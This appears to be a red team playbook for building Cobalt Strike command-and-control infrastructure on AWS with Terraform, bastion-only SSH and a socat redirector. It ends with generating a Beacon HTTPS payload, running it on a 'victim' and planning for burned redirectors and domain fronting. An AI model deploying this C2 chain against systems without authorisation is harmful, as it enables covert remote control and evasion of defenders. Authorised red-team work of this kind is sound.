Playbook · Infrastructure

Terraforming The Cloud

Automating red team infrastructure with Terraform.

This guide documents using Terraform to build red team infrastructure, following the companion blog post on manual red team infrastructure setup. The repository lives at github.com/rbfp/redteam-infra.

Pre-Requisites

Create an additional IAM user (terraform-redteam) with Power User permissions, disable its console login, and create access keys. Install Terraform and the AWS CLI on a Kali/Linux box:

$ sudo apt update
$ sudo apt install terraform
$ sudo apt install awscli

Step 0 — Download the GitHub Repo

Set up an SSH key with GitHub (docs), then clone:

$ git clone git@github.com:rbfp/redteam-infra.git
$ cd redteam-infra

Step 1 — Configure AWS CLI

Use a dedicated profile to keep credentials separate. Default region: us-west-2.

$ aws configure --profile redteam

Step 2 — Configure Region to Deploy

Run ./infra_setup.sh. It prompts for AWS profile, project name (e.g. redwest20), region, OS choice (Ubuntu recommended), and availability zones.

Step 3 — Terraform the Cloud

The automated Terraform commands execute, creating ~30 resources with auto-generated credentials.

The redirector and C2 server EC2 instances accept SSH only from the bastion host; there is no direct SSH path to them from the internet.

Step 4 — Verify Deployment

Use ./manage_aws.sh to start, stop, list instances, and check billing. Verify in the AWS Console that instances have no public IPv4 addresses, then test SSH through the bastion:

$ ssh -i ~/redteam_infra/build/{{ project_name }}-bastion.pem bastion@{{ bastion_ipv6 }}
$ ssh -i .ssh/internal.pem c2server@{{ c2_ipv4 }}
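The access rules from Steps 3 and 4 expressed as Terraform, as an added example that is not from the rbfp/redteam-infra repository: the bastion accepts SSH from the operator's IPv6 range, the internal hosts accept SSH only from the bastion's security group, and the C2 instance launches without a public IPv4 address. The VPC, private subnet, AMI and variables referenced in the block are assumed placeholders.

```hcl
# Added example, not from rbfp/redteam-infra. Placeholders: aws_vpc.redteam,
# aws_subnet.private, var.operator_ipv6_cidr, var.ami_id, var.project_name.

resource "aws_security_group" "bastion" {
  vpc_id = aws_vpc.redteam.id
  ingress {
    description      = "SSH from the operator network, IPv6 only"
    from_port        = 22
    to_port          = 22
    protocol         = "tcp"
    ipv6_cidr_blocks = [var.operator_ipv6_cidr]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

# Source is the bastion security group, not a CIDR: an internal host that later
# gets a public address by mistake still has no SSH path from the internet.
resource "aws_security_group" "internal_ssh" {
  vpc_id = aws_vpc.redteam.id
  ingress {
    description     = "SSH from the bastion only"
    from_port       = 22
    to_port         = 22
    protocol        = "tcp"
    security_groups = [aws_security_group.bastion.id]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

# Private-subnet instance with no public IPv4, which is what Step 4 checks for.
resource "aws_instance" "c2server" {
  ami                         = var.ami_id
  instance_type               = "t3.small"
  subnet_id                   = aws_subnet.private.id
  associate_public_ip_address = false
  vpc_security_group_ids      = [aws_security_group.internal_ssh.id]
}
```

After `terraform apply`, the Step 4 console check should show no public IPv4 on the C2 instance, and SSH to it should succeed only when started from the bastion.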

Step 5 — Cobalt Strike Install

Run ./cobalt_setup.sh to automate dependency install and file deployment. It prompts for the redirector IPv6, C2 server IPv4, redirector IPv4, project name, and the Cobalt Strike 7z password.

Step 7 — Cobalt Server Setup

Multiple concurrent terminal sessions are required.

On the C2 server:

$ chmod +x ./CS491/Server/teamserver ./CS491/Server/TeamServerImage
$ ./teamserver {{ c2_ipv4 }} {{ cobalt_server_pass }}

Attack box SSH tunnel:

$ ssh -i {{ project_name }}-bastion.pem -L 50050:{{ c2_ipv4 }}:50050 bastion@{{ bastion_ipv6 }}

Redirector traffic redirection:

$ sudo socat TCP6-LISTEN:443,reuseaddr,fork TCP4:{{ c2_ipv4 }}:443

Cobalt Strike client:

$ chmod +x ./cobaltstrike-client.sh
$ ./cobaltstrike-client.sh

Connect with host 127.0.0.1, port 50050.

Step 8 — Proof of Concept

Listener: name HTTPS, payload Beacon HTTPS, HTTPS hosts set to the redirector IPv6 (enclosed in square brackets).

Payload: listener HTTPS, system call Indirect, HTTP library winhttp. Execute the resulting .exe on the victim system to establish the beacon callback.

Future Considerations

Next steps are to work on domain fronting and a SOP/script for what to do when the redirector's public IPv6 gets burned.